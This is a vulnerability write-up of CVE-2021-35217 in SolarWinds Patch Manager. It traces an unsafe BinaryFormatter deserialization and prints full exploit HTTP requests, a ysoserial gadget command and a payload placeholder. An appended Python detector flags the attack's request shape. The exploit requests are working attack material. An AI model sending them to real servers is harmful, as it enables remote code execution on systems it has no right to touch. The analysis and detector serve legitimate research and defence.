CVE-2021-35217 SolarWinds PM WSAsyncExecuteTasks RCE
source link: https://y4er.com/post/cve-2021-35217-solarwinds-patch-manager-wsasyncexecutetasks-rce/
2021-10-23 Code Audit CVE SolarWinds
Following the research article by @testanull on Twitter, this post analyses another RCE, CVE-2021-35217.
The vulnerable endpoint is http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
During OnInit() initialization, JSONData is deserialized from the request and passed to the ExecuteItem() method.
Following into the ExecuteItem() method:
Lines 123 to 138 take ServerControlDefinition from JSONData, split it on `|` and `=`, and store the pieces in `var parameters = new Dictionary<String, String>();`, a string-to-string key/value dictionary.
Line 140 takes the Control value from parameters and loads that control, so the control value is attacker-controlled. Line 141 checks whether the control object is of type ScmResourceBaseAsync; if it is not, line 154 returns immediately.
So the first step is to find a control of type ScmResourceBaseAsync.
I used ~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx
Now construct the request:
POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=test|config.PreLoadMethodSerial=test;test","Parameters":[]}]
SolarWinds.PM.Web.dll!SolarWinds.PM.Web.Resources.ScmResourceBaseAsync.OnLoad(System.EventArgs e)
I found that if PreLoadMethodSerial is not empty, execution enters the deserialization path.
And the deserialization uses BinaryFormatter directly, so this is a direct RCE.
C:\Users\admin\Downloads\ysoserial-1.34\Release>ysoserial.exe -f binaryformatter -g SessionSecurityToken -c "ping localhost -t"
// UrlToken-encode the UTF-8 bytes of the ysoserial base64 output; the result is what goes into config.ParametersSerial
Response.Write(HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes("AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv...QEL")));
POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=HERE IS YOUR PAYLOAD|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd","Parameters":[]}]
Replace HERE IS YOUR PAYLOAD with your payload, and you have RCE.
My writing is poor, the wording flippant, the content shallow and the technique clumsy. Corrections and guidance from the masters are welcome; many thanks.
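A defender-side check for the request shape described above, added here as an example and not part of the original write-up: it mirrors the server's `|`/`=` parsing of ServerControlDefinition, flags a non-empty config.PreLoadMethodSerial (the condition under which the BinaryFormatter call is reached), and recognises a UrlToken-encoded BinaryFormatter stream in config.ParametersSerial by its header bytes, whether encoded directly or over a base64 text layer as in the Response.Write snippet. The sample body, the placeholder type name and the minimal stream bytes are constructed for this example.

```python
import base64
import json

BINARYFORMATTER_MAGIC = b"\x00\x01\x00\x00\x00\xff\xff\xff\xff"  # SerializationHeaderRecord: type 0x00, RootId 1, HeaderId -1

def url_token_encode(data: bytes) -> str:
    # HttpServerUtility.UrlTokenEncode: URL-safe base64, '=' padding replaced by a trailing count digit.
    b64 = base64.b64encode(data).decode("ascii")
    return b64.rstrip("=").replace("+", "-").replace("/", "_") + str(b64.count("="))

def url_token_decode(token: str) -> bytes:
    if not token[-1:].isdigit():  # inverse of the above; the last char is the padding count
        raise ValueError("not a UrlToken string")
    body = token[:-1].replace("-", "+").replace("_", "/") + "=" * int(token[-1])
    return base64.b64decode(body, validate=True)

def parse_server_control_definition(definition: str) -> dict:
    params = {}  # mirror the server: split on '|', then each part on its first '='
    for part in definition.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            params[key.strip()] = value
    return params

def looks_like_binaryformatter(value: str) -> bool:
    # Accept a directly encoded stream or the write-up's double layer (UrlToken over base64 text).
    try:
        raw = url_token_decode(value)
        return raw.startswith(BINARYFORMATTER_MAGIC) or \
            base64.b64decode(raw, validate=True).startswith(BINARYFORMATTER_MAGIC)
    except ValueError:
        return False

def inspect_request_body(body: str) -> list:
    # Findings for one WSAsyncExecuteTasks.aspx JSON body (a list of task objects).
    findings = []
    for item in json.loads(body):
        params = parse_server_control_definition(item.get("ServerControlDefinition") or "")
        if params.get("config.PreLoadMethodSerial"):
            findings.append("PreLoadMethodSerial set: deserialization path reachable")
        if looks_like_binaryformatter(params.get("config.ParametersSerial", "")):
            findings.append("ParametersSerial carries a BinaryFormatter stream")
    return findings

# Constructed sample (not from the write-up): header with version 1.0 plus MessageEnd (0x0B),
# encoded as the write-up does: base64 text, then UrlTokenEncode of that text.
FAKE_STREAM = BINARYFORMATTER_MAGIC + b"\x01\x00\x00\x00\x00\x00\x00\x00\x0b"
SAMPLE_BODY = json.dumps([{"ServerControlDefinition": "Control=~/Orion/PM/Controls/Update/"
    "GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=" + url_token_encode(base64.b64encode(FAKE_STREAM))
    + "|config.PreLoadMethodSerial=Placeholder.Type, Placeholder.Assembly;x", "Parameters": []}])
```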